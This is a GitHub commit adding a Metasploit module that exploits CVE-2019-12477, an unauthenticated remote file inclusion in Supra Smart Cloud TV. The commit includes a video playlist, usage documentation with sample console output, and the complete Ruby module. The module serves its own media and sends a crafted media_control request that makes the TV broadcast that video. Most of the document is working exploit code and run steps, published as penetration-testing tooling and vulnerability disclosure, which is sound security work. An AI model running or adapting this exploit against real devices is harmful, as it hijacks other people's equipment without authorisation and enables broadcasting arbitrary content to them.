Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Land #11952, Supra Smart Cloud TV RFI module
- Loading branch information
Showing
8 changed files
with
134 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,15 @@ | ||
#EXTM3U | ||
#EXT-X-VERSION:3 | ||
#EXT-X-TARGETDURATION:4 | ||
#EXT-X-MEDIA-SEQUENCE:0 | ||
#EXTINF:3.433333, | ||
epicsax0.ts | ||
#EXTINF:1.700000, | ||
epicsax1.ts | ||
#EXTINF:1.700000, | ||
epicsax2.ts | ||
#EXTINF:1.700000, | ||
epicsax3.ts | ||
#EXTINF:1.466667, | ||
epicsax4.ts | ||
#EXT-X-ENDLIST |
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
35 changes: 35 additions & 0 deletions
35
documentation/modules/auxiliary/admin/http/supra_smart_cloud_tv_rfi.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,35 @@ | ||
## Summary | ||
|
||
This module exploits an unauthenticated remote file inclusion which exists in Supra Smart Cloud TV. | ||
The media control for the device doesn't have any session management or authentication. Leveraging this, an | ||
attacker on the local network can send a crafted request to broadcast a fake video. | ||
|
||
**Reference:** https://www.inputzero.io/2019/06/hacking-smart-tv.html | ||
|
||
## Verification Steps | ||
|
||
1. `use auxiliary/admin/http/supra_smart_cloud_tv_rfi ` | ||
2. `set RHOSTS [IP]` | ||
3. `set SRVHOST [IP]` | ||
4. `run` | ||
|
||
Doo-doodoodoodoodoo-doo, Epic Sax Guy will be broadcasted to the remote system. | ||
|
||
## Sample Output | ||
|
||
``` | ||
msf5 > use auxiliary/admin/http/supra_smart_cloud_tv_rfi | ||
msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > set SRVHOST 192.168.1.132 | ||
SRVHOST => 192.168.1.132 | ||
msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > set RHOSTS 192.168.1.155 | ||
RHOSTS => 192.168.1.155 | ||
msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > run | ||
[*] Running module against 192.168.1.155 | ||
[*] Using URL: http://192.168.1.132:8080/ | ||
[*] Broadcasting Epic Sax Guy to 192.168.1.155:80 | ||
[+] Doo-doodoodoodoodoo-doo | ||
[*] Sleeping for 10s serving .m3u8 and .ts files... | ||
[*] Server stopped. | ||
[*] Auxiliary module execution completed | ||
msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > | ||
``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,84 @@ | ||
## | ||
# This module requires Metasploit: https://metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
class MetasploitModule < Msf::Auxiliary | ||
include Msf::Exploit::Remote::HttpClient | ||
include Msf::Exploit::Remote::HttpServer | ||
|
||
def initialize(info = {}) | ||
super(update_info(info, | ||
'Name' => 'Supra Smart Cloud TV Remote File Inclusion', | ||
'Description' => %q{ | ||
This module exploits an unauthenticated remote file inclusion which | ||
exists in Supra Smart Cloud TV. The media control for the device doesn't | ||
have any session management or authentication. Leveraging this, an | ||
attacker on the local network can send a crafted request to broadcast a | ||
fake video. | ||
}, | ||
'Author' => [ | ||
'Dhiraj Mishra', # Discovery, PoC, and module | ||
'wvu' # Module | ||
], | ||
'References' => [ | ||
['CVE', '2019-12477'], | ||
['URL', 'https://www.inputzero.io/2019/06/hacking-smart-tv.html'] | ||
], | ||
'DisclosureDate' => '2019-06-03', | ||
'License' => MSF_LICENSE | ||
)) | ||
|
||
deregister_options('URIPATH') | ||
end | ||
|
||
def run | ||
start_service('Path' => '/') | ||
|
||
print_status("Broadcasting Epic Sax Guy to #{peer}") | ||
res = send_request_cgi( | ||
'method' => 'GET', | ||
'uri' => '/remote/media_control', | ||
'encode_params' => false, | ||
'vars_get' => { | ||
'action' => 'setUri', | ||
'uri' => get_uri + 'epicsax.m3u8' | ||
} | ||
) | ||
|
||
unless res && res.code == 200 && res.body.include?('OK') | ||
print_error('No doo-doodoodoodoodoo-doo for you') | ||
return | ||
end | ||
|
||
# Sleep time calibrated using successful pcap | ||
print_good('Doo-doodoodoodoodoo-doo') | ||
print_status('Sleeping for 10s serving .m3u8 and .ts files...') | ||
sleep(10) | ||
end | ||
|
||
def on_request_uri(cli, request) | ||
dir = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-12477') | ||
|
||
files = { | ||
'/epicsax.m3u8' => 'application/x-mpegURL', | ||
'/epicsax0.ts' => 'video/MP2T', | ||
'/epicsax1.ts' => 'video/MP2T', | ||
'/epicsax2.ts' => 'video/MP2T', | ||
'/epicsax3.ts' => 'video/MP2T', | ||
'/epicsax4.ts' => 'video/MP2T' | ||
} | ||
|
||
file = request.uri | ||
|
||
unless files.include?(file) | ||
vprint_error("Sending 404 for #{file}") | ||
return send_not_found(cli) | ||
end | ||
|
||
data = File.read(File.join(dir, file)) | ||
|
||
vprint_good("Sending #{file}") | ||
send_response(cli, data, 'Content-Type' => files[file]) | ||
end | ||
end |